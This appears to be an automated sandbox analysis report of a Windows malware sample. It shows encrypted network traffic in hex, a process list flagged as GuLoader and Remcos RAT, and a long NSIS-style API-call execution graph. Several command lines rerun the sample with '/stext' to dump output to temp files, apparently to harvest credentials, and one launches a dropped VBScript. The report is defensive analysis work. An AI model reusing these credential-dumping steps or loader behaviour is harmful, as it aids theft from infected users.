                                                                                    2025-01-14 14:32:07 UTC8000INData Raw: c5 05 3d 3b 77 e5 ab 9e 85 41 f4 35 46 ad 80 5c 27 0e c9 07 23 34 d6 b7 63 95 67 b7 b1 91 3f ef 7f ff cb 91 cc e4 9f dc 99 d7 c1 38 2f 5d 2a bc d0 a6 36 8c c2 53 d6 e4 fd 32 28 c6 b5 16 a9 a9 af af 84 b6 2b 70 3f 39 4b 99 c8 1a 72 f2 a7 7d c0 2e 7a 25 3a 7f 15 24 29 b5 7a cc 75 93 8b 16 07 bd 44 23 f9 55 ef 22 11 ca 38 32 a2 2a b7 9b 31 60 5d 3d c2 a1 e5 1d 1a 72 e6 8f 6b b6 17 e3 0c 31 da c2 ce e6 29 31 2f f6 39 40 be 92 f9 5d d6 27 a0 a4 47 45 ee b2 a4 b4 3c da 8e 6b 66 82 9e a1 4e f9 21 0a a5 83 01 9a ae 53 aa 21 88 99 c7 ad 98 ac 1a a8 3f cb 04 64 c9 ea 4a 2e 85 34 36 31 8e a8 c9 8d 17 dc ec 67 fd c5 03 e0 7b 1c dd 69 77 26 2c 62 16 be 68 03 32 b8 17 a7 14 ff 07 74 04 77 63 a0 30 ab 42 6f 33 6a 33 44 c8 b1 d6 c7 3c 84 a8 4f 83 03 ca 4d 57 24 58 92 6f
                                                                                    Data Ascii: =;wA5F\'#4cg?8/]*6S2(+p?9Kr}.z%:$)zuD#U"82*1`]=rk1)1/9@]'GE<kfN!S!?dJ.461g{iw&,bh2twc0Bo3j3D<OMW$Xo
                                                                                    2025-01-14 14:32:07 UTC8000INData Raw: e6 b7 0d 40 8b 1e d8 64 6c d9 a2 d6 72 bd 50 85 29 57 23 a8 f7 4d 56 51 67 ff 06 88 a0 83 5f 65 f0 f8 fa 19 6a fb f3 9b 97 b5 30 da e0 34 bc 86 43 62 50 0d 98 a4 49 5b e4 ac 8d 19 a9 79 5b d7 09 ec f8 3c 05 93 f3 33 1b 7f f3 4d 11 6d 44 c1 12 f1 00 a2 90 41 4d 0c 00 49 0b d7 d2 54 b6 d8 7e 71 83 65 e9 42 89 b6 8c 9c 5d 40 66 6c 12 8c 8d 8e 16 05 fb 7d 5e 9f 0b 78 32 92 17 d2 f5 44 0f b2 71 1f 1d 71 e1 85 2c 23 4e 49 f3 84 c6 28 da 50 62 49 97 8e 70 74 fd d8 09 df 66 6c 07 4a b4 80 fb af 92 85 9a 18 f7 df b0 81 fc f9 6a 4f 30 57 43 36 a6 ab 93 39 15 7a 89 87 76 e8 aa d4 76 0e 3b 96 3c c0 0b d9 14 94 a3 3b e0 e4 57 08 08 87 9a 35 bb ef 80 5c f5 53 6c d5 8b ed 80 cb 58 38 c2 4e 69 40 69 7a 80 8d 93 d5 a6 a9 c8 ef 33 34 b5 1a 3f 37 41 ad e6 1c bd f0 1f 79 73
                                                                                    Data Ascii: @dlrP)W#MVQg_ej04CbPI[y[<3MmDAMIT~qeB]@fl}^x2Dqq,#NI(PbIptflJjO0WC69zvv;<;W5\SlX8Ni@iz34?7Ays
                                                                                    2025-01-14 14:32:07 UTC8000INData Raw: f1 54 97 8d 24 06 d5 1c 60 45 f2 66 ee 49 f5 64 db 33 93 03 7c 25 b1 59 98 b4 3a 26 56 a6 3f 9a 3a f3 1e aa 4f 76 dc 87 e4 c3 ad a4 ac 05 aa 86 e2 cc a1 f0 20 3b a0 98 c5 02 25 21 8b ef 0b 50 d7 91 c9 a3 83 22 a9 02 f8 d5 97 17 85 0e 0b 0d 5b b9 d2 3c 9c c3 14 19 72 39 c9 6c 32 67 99 d7 91 5b f7 19 31 65 53 93 68 02 d2 b6 94 3a b2 be c1 9e 1a 72 0b d8 29 4d 2e 6a 6c 54 cf ac ba 5d 65 d6 fc 9d 9d 74 4a e4 c7 7f 57 29 f4 1f 13 1d 21 7c c0 f2 0b d0 0c 50 74 f1 73 e3 68 3b fa bf 33 bc 89 58 6f 66 fc 64 d7 f7 93 05 2e e3 99 8e 4a 3e 67 ac c4 b0 0b 40 dd a0 0d 80 91 8f 8a 2d 76 a3 e1 70 4f f7 60 c9 da 5c ab 46 56 c5 19 4b e8 bf 17 15 02 ca 24 b7 0b f3 ca 82 bf 7c 5d 51 1b ec 97 41 93 23 6d 3e ad 24 c7 89 6c 29 6f 14 88 4f ab 52 43 39 43 18 5f 0a 65 3a 54 9b 01
                                                                                    Data Ascii: T$`EfId3|%Y:&V?:Ov ;%!P"[<r9l2g[1eSh:r)M.jlT]etJW)!|Ptsh;3Xofd.J>g@-vpO`\FVK$|]QA#m>$l)oORC9C_e:T
                                                                                    2025-01-14 14:32:07 UTC8000INData Raw: bf e7 84 d7 32 13 db 41 22 ad 47 26 44 8c 21 ed 4a 2c 45 f5 71 bd 43 2d 7b 48 ee 56 66 a4 d5 90 28 1c 67 4f d9 97 f5 42 bc 53 91 8c c2 2f 4b a2 4e 56 7e fa ed 5a 96 e2 ae bc 7d f0 05 da 70 56 16 24 62 97 53 fe 59 81 59 89 28 52 bb 45 d7 f1 e1 e1 e3 86 37 c1 e5 ba 67 dc f5 f3 8f 43 64 ba 53 c3 82 7f 3c 48 a9 3c 8e c6 cf 91 ec 56 cc 2b df 1d 7b cf f4 5d ed 69 8a 92 90 17 0b 0b 32 2a 27 b1 d8 6d 12 5a d9 15 89 7f 83 d9 45 5a 5b 13 f6 dc 7a dc 68 3f 51 40 b5 42 4e 8c 5e 55 74 a6 75 99 ac 9f 86 f8 e8 01 e2 5b a1 94 97 df 3f 01 8a 32 53 5f ad 32 3d 88 de 65 c5 ea ff 6b 4b e2 a4 dc 2f f9 f0 6b 23 a3 a3 b7 58 65 98 8e 2a 09 b6 89 cf 20 6b 2a 28 67 ca be 5d 35 c4 71 cc 55 15 72 f3 ea 11 e1 c0 ef 91 a8 46 11 b0 17 b8 84 9c 5b 7f 96 50 8e 2e 4a 74 a1 81 98 67 be 56
                                                                                    Data Ascii: 2A"G&D!J,EqC-{HVf(gOBS/KNV~Z}pV$bSYY(RE7gCdS<H<V+{]i2*'mZEZ[zh?Q@BN^Utu[?2S_2=ekK/k#Xe* k*(g]5qUrF[P.JtgV


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:09:29:41
                                                                                    Start date:14/01/2025
                                                                                    Path:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\LrBF2Z930N.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:550'217 bytes
                                                                                    MD5 hash:25EEC63EDF7C0EB8628A89712B5CB363
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3386711398.0000000006CE9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:09:31:50
                                                                                    Start date:14/01/2025
                                                                                    Path:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\LrBF2Z930N.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:550'217 bytes
                                                                                    MD5 hash:25EEC63EDF7C0EB8628A89712B5CB363
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.3686330265.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.3656973543.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4483574475.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.3626980783.00000000069D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.3643661396.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4458828741.00000000069BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.3647469796.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.3652191797.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4458828741.00000000069A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:09:32:17
                                                                                    Start date:14/01/2025
                                                                                    Path:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\LrBF2Z930N.exe /stext "C:\Users\user\AppData\Local\Temp\rldkxktiiyi"
                                                                                    Imagebase:0x400000
                                                                                    File size:550'217 bytes
                                                                                    MD5 hash:25EEC63EDF7C0EB8628A89712B5CB363
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:6
                                                                                    Start time:09:32:17
                                                                                    Start date:14/01/2025
                                                                                    Path:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\LrBF2Z930N.exe /stext "C:\Users\user\AppData\Local\Temp\tgicxdejwgafity"
                                                                                    Imagebase:0x400000
                                                                                    File size:550'217 bytes
                                                                                    MD5 hash:25EEC63EDF7C0EB8628A89712B5CB363
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:7
                                                                                    Start time:09:32:17
                                                                                    Start date:14/01/2025
                                                                                    Path:C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\LrBF2Z930N.exe /stext "C:\Users\user\AppData\Local\Temp\einnyvodjoskszmffx"
                                                                                    Imagebase:0x400000
                                                                                    File size:550'217 bytes
                                                                                    MD5 hash:25EEC63EDF7C0EB8628A89712B5CB363
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:8
                                                                                    Start time:09:33:36
                                                                                    Start date:14/01/2025
                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs"
                                                                                    Imagebase:0xe60000
                                                                                    File size:147'456 bytes
                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:15.7%
                                                                                      Dynamic/Decrypted Code Coverage:13.4%
                                                                                      Signature Coverage:15.9%
                                                                                      Total number of Nodes:1606
                                                                                      Total number of Limit Nodes:33
                                                                                      execution_graph 5197 4047c0 5199 4048f2 5197->5199 5201 4047d8 5197->5201 5198 40495c 5200 404a26 5198->5200 5202 404966 GetDlgItem 5198->5202 5199->5198 5199->5200 5206 40492d GetDlgItem SendMessageW 5199->5206 5240 404668 5200->5240 5228 404601 5201->5228 5204 404980 5202->5204 5205 4049e7 5202->5205 5204->5205 5210 4049a6 SendMessageW LoadCursorW SetCursor 5204->5210 5205->5200 5211 4049f9 5205->5211 5233 404623 EnableWindow 5206->5233 5207 40483f 5213 404601 22 API calls 5207->5213 5209 404a21 5237 404a6f 5210->5237 5215 404a0f 5211->5215 5216 4049ff SendMessageW 5211->5216 5218 40484c CheckDlgButton 5213->5218 5215->5209 5220 404a15 SendMessageW 5215->5220 5216->5215 5217 404957 5234 404a4b 5217->5234 5231 404623 EnableWindow 5218->5231 5220->5209 5223 40486a GetDlgItem 5232 404636 SendMessageW 5223->5232 5225 404880 SendMessageW 5226 4048a6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5225->5226 5227 40489d GetSysColor 5225->5227 5226->5209 5227->5226 5229 4066bf 21 API calls 5228->5229 5230 40460c SetDlgItemTextW 5229->5230 5230->5207 5231->5223 5232->5225 5233->5217 5235 404a59 5234->5235 5236 404a5e SendMessageW 5234->5236 5235->5236 5236->5198 5254 405ca8 ShellExecuteExW 5237->5254 5239 4049d5 LoadCursorW SetCursor 5239->5205 5241 40472b 5240->5241 5242 404680 GetWindowLongW 5240->5242 5241->5209 5242->5241 5243 404695 5242->5243 5243->5241 5244 4046c2 GetSysColor 5243->5244 5245 4046c5 5243->5245 5244->5245 5246 4046d5 SetBkMode 5245->5246 5247 4046cb SetTextColor 5245->5247 5248 4046f3 5246->5248 5249 4046ed GetSysColor 5246->5249 5247->5246 5250 404704 5248->5250 5251 4046fa SetBkColor 5248->5251 5249->5248 5250->5241 5252 404717 DeleteObject 5250->5252 5253 40471e CreateBrushIndirect 5250->5253 5251->5250 5252->5253 5253->5241 5254->5239 5255 402643 5256 402672 5255->5256 5257 402657 5255->5257 5259 4026a2 5256->5259 5260 402677 5256->5260 5258 402d89 21 API calls 5257->5258 5268 40265e 5258->5268 5262 402dab 21 API calls 5259->5262 5261 402dab 21 API calls 5260->5261 5264 40267e 5261->5264 5263 4026a9 lstrlenW 5262->5263 5263->5268 5272 4066a4 WideCharToMultiByte 5264->5272 5266 402692 lstrlenA 5266->5268 5267 4026ec 5268->5267 5270 406253 5 API calls 5268->5270 5271 4026d6 5268->5271 5269 406224 WriteFile 5269->5267 5270->5271 5271->5267 5271->5269 5272->5266 5273 6e39103d 5276 6e39101b 5273->5276 5283 6e3915b6 5276->5283 5278 6e391020 5279 6e391024 5278->5279 5280 6e391027 GlobalAlloc 5278->5280 5281 6e3915dd 3 API calls 5279->5281 5280->5279 5282 6e39103b 5281->5282 5285 6e3915bc 5283->5285 5284 6e3915c2 5284->5278 5285->5284 5286 6e3915ce GlobalFree 5285->5286 5286->5278 4322 403645 SetErrorMode GetVersionExW 4323 4036d1 4322->4323 4324 403699 GetVersionExW 4322->4324 4325 403728 4323->4325 4326 406a76 5 API calls 4323->4326 4324->4323 4327 406a06 3 API calls 4325->4327 4326->4325 4328 40373e lstrlenA 4327->4328 4328->4325 4329 40374e 4328->4329 4330 406a76 5 API calls 4329->4330 4331 403755 4330->4331 4332 406a76 5 API calls 4331->4332 4333 40375c 4332->4333 4334 406a76 5 API calls 4333->4334 4335 403768 #17 OleInitialize SHGetFileInfoW 4334->4335 4410 406682 lstrcpynW 4335->4410 4338 4037b7 GetCommandLineW 4411 406682 lstrcpynW 4338->4411 4340 4037c9 4341 405f7e CharNextW 4340->4341 4342 4037ef CharNextW 4341->4342 4350 403801 4342->4350 4343 403903 4344 403917 GetTempPathW 4343->4344 4412 403614 4344->4412 4346 40392f 4347 403933 GetWindowsDirectoryW lstrcatW 4346->4347 4348 403989 DeleteFileW 4346->4348 4351 403614 12 API calls 4347->4351 4422 4030d5 GetTickCount GetModuleFileNameW 4348->4422 4349 405f7e CharNextW 4349->4350 4350->4343 4350->4349 4356 403905 4350->4356 4353 40394f 4351->4353 4353->4348 4355 403953 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4353->4355 4354 40399d 4362 405f7e CharNextW 4354->4362 4393 403a44 4354->4393 4401 403a54 4354->4401 4357 403614 12 API calls 4355->4357 4509 406682 lstrcpynW 4356->4509 4360 403981 4357->4360 4360->4348 4360->4401 4366 4039bc 4362->4366 4364 403ba2 4595 405ce2 4364->4595 4365 403bc6 4367 403c4a ExitProcess 4365->4367 4368 403bce GetCurrentProcess OpenProcessToken 4365->4368 4372 403a1a 4366->4372 4373 403a5d 4366->4373 4370 403be6 LookupPrivilegeValueW AdjustTokenPrivileges 4368->4370 4371 403c1a 4368->4371 4370->4371 4377 406a76 5 API calls 4371->4377 4510 406059 4372->4510 4526 405c4d 4373->4526 4380 403c21 4377->4380 4383 403c36 ExitWindowsEx 4380->4383 4385 403c43 4380->4385 4383->4367 4383->4385 4384 403a7c 4387 403a94 4384->4387 4530 406682 lstrcpynW 4384->4530 4599 40140b 4385->4599 4392 403aba wsprintfW 4387->4392 4407 403ae6 4387->4407 4389 403a39 4525 406682 lstrcpynW 4389->4525 4394 4066bf 21 API calls 4392->4394 4452 403d54 4393->4452 4394->4387 4397 403b30 SetCurrentDirectoryW 4576 406442 MoveFileExW 4397->4576 4398 403af6 GetFileAttributesW 4399 403b02 DeleteFileW 4398->4399 4398->4407 4399->4407 4586 403c62 4401->4586 4404 406442 40 API calls 4404->4407 4405 4066bf 21 API calls 4405->4407 4407->4387 4407->4392 4407->4397 4407->4398 4407->4401 4407->4404 4407->4405 4408 403bb8 CloseHandle 4407->4408 4531 405bd6 CreateDirectoryW 4407->4531 4534 405c30 CreateDirectoryW 4407->4534 4537 405d8e 4407->4537 4580 405c65 CreateProcessW 4407->4580 4583 4069df FindFirstFileW 4407->4583 4408->4401 4410->4338 4411->4340 4413 406930 5 API calls 4412->4413 4415 403620 4413->4415 4414 40362a 4414->4346 4415->4414 4602 405f51 lstrlenW CharPrevW 4415->4602 4418 405c30 2 API calls 4419 403638 4418->4419 4420 4061a1 2 API calls 4419->4420 4421 403643 4420->4421 4421->4346 4605 406172 GetFileAttributesW CreateFileW 4422->4605 4424 403118 4451 403125 4424->4451 4606 406682 lstrcpynW 4424->4606 4426 40313b 4607 405f9d lstrlenW 4426->4607 4430 40314c GetFileSize 4445 403246 4430->4445 4450 403163 4430->4450 4434 40328b GlobalAlloc 4436 4032a2 4434->4436 4435 4032e3 4438 403033 36 API calls 4435->4438 4440 4061a1 2 API calls 4436->4440 4438->4451 4439 40326c 4441 4035e7 ReadFile 4439->4441 4444 4032b3 CreateFileW 4440->4444 4443 403277 4441->4443 4442 403033 36 API calls 4442->4450 4443->4434 4443->4451 4446 4032ed 4444->4446 4444->4451 4612 403033 4445->4612 4627 4035fd SetFilePointer 4446->4627 4448 4032fb 4628 403376 4448->4628 4450->4435 4450->4442 4450->4445 4450->4451 4643 4035e7 4450->4643 4451->4354 4453 406a76 5 API calls 4452->4453 4454 403d68 4453->4454 4455 403d80 4454->4455 4458 403d6e 4454->4458 4456 406550 3 API calls 4455->4456 4457 403db0 4456->4457 4459 403dcf lstrcatW 4457->4459 4461 406550 3 API calls 4457->4461 4698 4065c9 wsprintfW 4458->4698 4462 403d7e 4459->4462 4461->4459 4690 40402a 4462->4690 4465 406059 18 API calls 4466 403e01 4465->4466 4467 403e95 4466->4467 4469 406550 3 API calls 4466->4469 4468 406059 18 API calls 4467->4468 4470 403e9b 4468->4470 4471 403e33 4469->4471 4472 403eab LoadImageW 4470->4472 4473 4066bf 21 API calls 4470->4473 4471->4467 4479 403e54 lstrlenW 4471->4479 4480 405f7e CharNextW 4471->4480 4474 403f51 4472->4474 4475 403ed2 RegisterClassW 4472->4475 4473->4472 4478 40140b 2 API calls 4474->4478 4476 403f5b 4475->4476 4477 403f08 SystemParametersInfoW CreateWindowExW 4475->4477 4476->4401 4477->4474 4483 403f57 4478->4483 4481 403e62 lstrcmpiW 4479->4481 4482 403e88 4479->4482 4484 403e51 4480->4484 4481->4482 4485 403e72 GetFileAttributesW 4481->4485 4486 405f51 3 API calls 4482->4486 4483->4476 4488 40402a 22 API calls 4483->4488 4484->4479 4487 403e7e 4485->4487 4489 403e8e 4486->4489 4487->4482 4490 405f9d 2 API calls 4487->4490 4491 403f68 4488->4491 4699 406682 lstrcpynW 4489->4699 4490->4482 4493 403f74 ShowWindow 4491->4493 4494 403ff7 4491->4494 4496 406a06 3 API calls 4493->4496 4700 4057da OleInitialize 4494->4700 4498 403f8c 4496->4498 4497 403ffd 4499 404001 4497->4499 4500 404019 4497->4500 4501 403f9a GetClassInfoW 4498->4501 4505 406a06 3 API calls 4498->4505 4499->4476 4507 40140b 2 API calls 4499->4507 4504 40140b 2 API calls 4500->4504 4502 403fc4 DialogBoxParamW 4501->4502 4503 403fae GetClassInfoW RegisterClassW 4501->4503 4506 40140b 2 API calls 4502->4506 4503->4502 4504->4476 4505->4501 4508 403fec 4506->4508 4507->4476 4508->4476 4509->4344 4718 406682 lstrcpynW 4510->4718 4512 40606a 4719 405ffc CharNextW CharNextW 4512->4719 4515 403a26 4515->4401 4524 406682 lstrcpynW 4515->4524 4516 406930 5 API calls 4522 406080 4516->4522 4517 4060b1 lstrlenW 4518 4060bc 4517->4518 4517->4522 4520 405f51 3 API calls 4518->4520 4519 4069df 2 API calls 4519->4522 4521 4060c1 GetFileAttributesW 4520->4521 4521->4515 4522->4515 4522->4517 4522->4519 4523 405f9d 2 API calls 4522->4523 4523->4517 4524->4389 4525->4393 4527 406a76 5 API calls 4526->4527 4528 403a62 lstrlenW 4527->4528 4529 406682 lstrcpynW 4528->4529 4529->4384 4530->4387 4532 405c22 4531->4532 4533 405c26 GetLastError 4531->4533 4532->4407 4533->4532 4535 405c40 4534->4535 4536 405c44 GetLastError 4534->4536 4535->4407 4536->4535 4538 406059 18 API calls 4537->4538 4539 405dae 4538->4539 4540 405db6 DeleteFileW 4539->4540 4541 405dcd 4539->4541 4544 405f04 4540->4544 4545 405ef8 4541->4545 4725 406682 lstrcpynW 4541->4725 4543 405df3 4546 405e06 4543->4546 4547 405df9 lstrcatW 4543->4547 4544->4407 4545->4544 4548 4069df 2 API calls 4545->4548 4550 405f9d 2 API calls 4546->4550 4549 405e0c 4547->4549 4552 405f12 4548->4552 4551 405e1c lstrcatW 4549->4551 4553 405e27 lstrlenW FindFirstFileW 4549->4553 4550->4549 4551->4553 4552->4544 4554 405f16 4552->4554 4555 405eed 4553->4555 4574 405e49 4553->4574 4556 405f51 3 API calls 4554->4556 4555->4545 4557 405f1c 4556->4557 4559 405d46 5 API calls 4557->4559 4558 405ed0 FindNextFileW 4562 405ee6 FindClose 4558->4562 4558->4574 4561 405f28 4559->4561 4563 405f42 4561->4563 4564 405f2c 4561->4564 4562->4555 4565 405707 28 API calls 4563->4565 4564->4544 4567 405707 28 API calls 4564->4567 4565->4544 4569 405f39 4567->4569 4568 405d8e 64 API calls 4568->4574 4571 406442 40 API calls 4569->4571 4570 405707 28 API calls 4570->4558 4573 405f40 4571->4573 4572 405707 28 API calls 4572->4574 4573->4544 4574->4558 4574->4568 4574->4570 4574->4572 4575 406442 40 API calls 4574->4575 4726 406682 lstrcpynW 4574->4726 4727 405d46 4574->4727 4575->4574 4577 403b3f CopyFileW 4576->4577 4578 406456 4576->4578 4577->4401 4577->4407 4738 4062c8 4578->4738 4581 405ca4 4580->4581 4582 405c98 CloseHandle 4580->4582 4581->4407 4582->4581 4584 406a00 4583->4584 4585 4069f5 FindClose 4583->4585 4584->4407 4585->4584 4587 403c73 CloseHandle 4586->4587 4588 403c7d 4586->4588 4587->4588 4589 403c91 4588->4589 4590 403c87 CloseHandle 4588->4590 4772 403cbf 4589->4772 4590->4589 4593 405d8e 71 API calls 4594 403b95 OleUninitialize 4593->4594 4594->4364 4594->4365 4597 405cf7 4595->4597 4596 403bb0 ExitProcess 4597->4596 4598 405d0b MessageBoxIndirectW 4597->4598 4598->4596 4600 401389 2 API calls 4599->4600 4601 401420 4600->4601 4601->4367 4603 403632 4602->4603 4604 405f6d lstrcatW 4602->4604 4603->4418 4604->4603 4605->4424 4606->4426 4608 405fab 4607->4608 4609 405fb1 CharPrevW 4608->4609 4610 403141 4608->4610 4609->4608 4609->4610 4611 406682 lstrcpynW 4610->4611 4611->4430 4613 403044 4612->4613 4614 40305c 4612->4614 4615 40304d DestroyWindow 4613->4615 4618 403054 4613->4618 4616 403064 4614->4616 4617 40306c GetTickCount 4614->4617 4615->4618 4647 406ab2 4616->4647 4617->4618 4619 40307a 4617->4619 4618->4434 4618->4451 4646 4035fd SetFilePointer 4618->4646 4621 403082 4619->4621 4622 4030af CreateDialogParamW ShowWindow 4619->4622 4621->4618 4651 403017 4621->4651 4622->4618 4624 403090 wsprintfW 4654 405707 4624->4654 4627->4448 4629 4033a1 4628->4629 4630 403385 SetFilePointer 4628->4630 4665 40347e GetTickCount 4629->4665 4630->4629 4635 40347e 46 API calls 4636 4033d8 4635->4636 4637 40343e 4636->4637 4638 403444 ReadFile 4636->4638 4640 4033e7 4636->4640 4637->4451 4638->4637 4640->4637 4641 4061f5 ReadFile 4640->4641 4680 406224 WriteFile 4640->4680 4641->4640 4644 4061f5 ReadFile 4643->4644 4645 4035fa 4644->4645 4645->4450 4646->4439 4648 406acf PeekMessageW 4647->4648 4649 406ac5 DispatchMessageW 4648->4649 4650 406adf 4648->4650 4649->4648 4650->4618 4652 403026 4651->4652 4653 403028 MulDiv 4651->4653 4652->4653 4653->4624 4655 405722 4654->4655 4664 4030ad 4654->4664 4656 40573e lstrlenW 4655->4656 4657 4066bf 21 API calls 4655->4657 4658 405767 4656->4658 4659 40574c lstrlenW 4656->4659 4657->4656 4660 40577a 4658->4660 4661 40576d SetWindowTextW 4658->4661 4662 40575e lstrcatW 4659->4662 4659->4664 4663 405780 SendMessageW SendMessageW SendMessageW 4660->4663 4660->4664 4661->4660 4662->4658 4663->4664 4664->4618 4666 4035d6 4665->4666 4667 4034ac 4665->4667 4668 403033 36 API calls 4666->4668 4682 4035fd SetFilePointer 4667->4682 4674 4033a8 4668->4674 4670 4034b7 SetFilePointer 4676 4034dc 4670->4676 4671 4035e7 ReadFile 4671->4676 4673 403033 36 API calls 4673->4676 4674->4637 4678 4061f5 ReadFile 4674->4678 4675 406224 WriteFile 4675->4676 4676->4671 4676->4673 4676->4674 4676->4675 4677 4035b7 SetFilePointer 4676->4677 4683 406bf1 4676->4683 4677->4666 4679 4033c1 4678->4679 4679->4635 4679->4637 4681 406242 4680->4681 4681->4640 4682->4670 4684 406c16 4683->4684 4685 406c1e 4683->4685 4684->4676 4685->4684 4686 406ca5 GlobalFree 4685->4686 4687 406cae GlobalAlloc 4685->4687 4688 406d25 GlobalAlloc 4685->4688 4689 406d1c GlobalFree 4685->4689 4686->4687 4687->4684 4687->4685 4688->4684 4688->4685 4689->4688 4691 40403e 4690->4691 4707 4065c9 wsprintfW 4691->4707 4693 4040af 4708 4040e3 4693->4708 4695 403ddf 4695->4465 4696 4040b4 4696->4695 4697 4066bf 21 API calls 4696->4697 4697->4696 4698->4462 4699->4467 4711 40464d 4700->4711 4702 4057fd 4706 405824 4702->4706 4714 401389 4702->4714 4703 40464d SendMessageW 4704 405836 OleUninitialize 4703->4704 4704->4497 4706->4703 4707->4693 4709 4066bf 21 API calls 4708->4709 4710 4040f1 SetWindowTextW 4709->4710 4710->4696 4712 404665 4711->4712 4713 404656 SendMessageW 4711->4713 4712->4702 4713->4712 4716 401390 4714->4716 4715 4013fe 4715->4702 4716->4715 4717 4013cb MulDiv SendMessageW 4716->4717 4717->4716 4718->4512 4720 406019 4719->4720 4721 40602b 4719->4721 4720->4721 4722 406026 CharNextW 4720->4722 4723 40604f 4721->4723 4724 405f7e CharNextW 4721->4724 4722->4723 4723->4515 4723->4516 4724->4721 4725->4543 4726->4574 4735 40614d GetFileAttributesW 4727->4735 4730 405d73 4730->4574 4731 405d61 RemoveDirectoryW 4733 405d6f 4731->4733 4732 405d69 DeleteFileW 4732->4733 4733->4730 4734 405d7f SetFileAttributesW 4733->4734 4734->4730 4736 405d52 4735->4736 4737 40615f SetFileAttributesW 4735->4737 4736->4730 4736->4731 4736->4732 4737->4736 4739 4062f8 4738->4739 4740 40631e GetShortPathNameW 4738->4740 4765 406172 GetFileAttributesW CreateFileW 4739->4765 4742 406333 4740->4742 4743 40643d 4740->4743 4742->4743 4745 40633b wsprintfA 4742->4745 4743->4577 4744 406302 CloseHandle GetShortPathNameW 4744->4743 4746 406316 4744->4746 4747 4066bf 21 API calls 4745->4747 4746->4740 4746->4743 4748 406363 4747->4748 4766 406172 GetFileAttributesW CreateFileW 4748->4766 4750 406370 4750->4743 4751 40637f GetFileSize GlobalAlloc 4750->4751 4752 4063a1 4751->4752 4753 406436 CloseHandle 4751->4753 4754 4061f5 ReadFile 4752->4754 4753->4743 4755 4063a9 4754->4755 4755->4753 4767 4060d7 lstrlenA 4755->4767 4758 4063c0 lstrcpyA 4761 4063e2 4758->4761 4759 4063d4 4760 4060d7 4 API calls 4759->4760 4760->4761 4762 406419 SetFilePointer 4761->4762 4763 406224 WriteFile 4762->4763 4764 40642f GlobalFree 4763->4764 4764->4753 4765->4744 4766->4750 4768 406118 lstrlenA 4767->4768 4769 406120 4768->4769 4770 4060f1 lstrcmpiA 4768->4770 4769->4758 4769->4759 4770->4769 4771 40610f CharNextA 4770->4771 4771->4768 4773 403ccd 4772->4773 4774 403c96 4773->4774 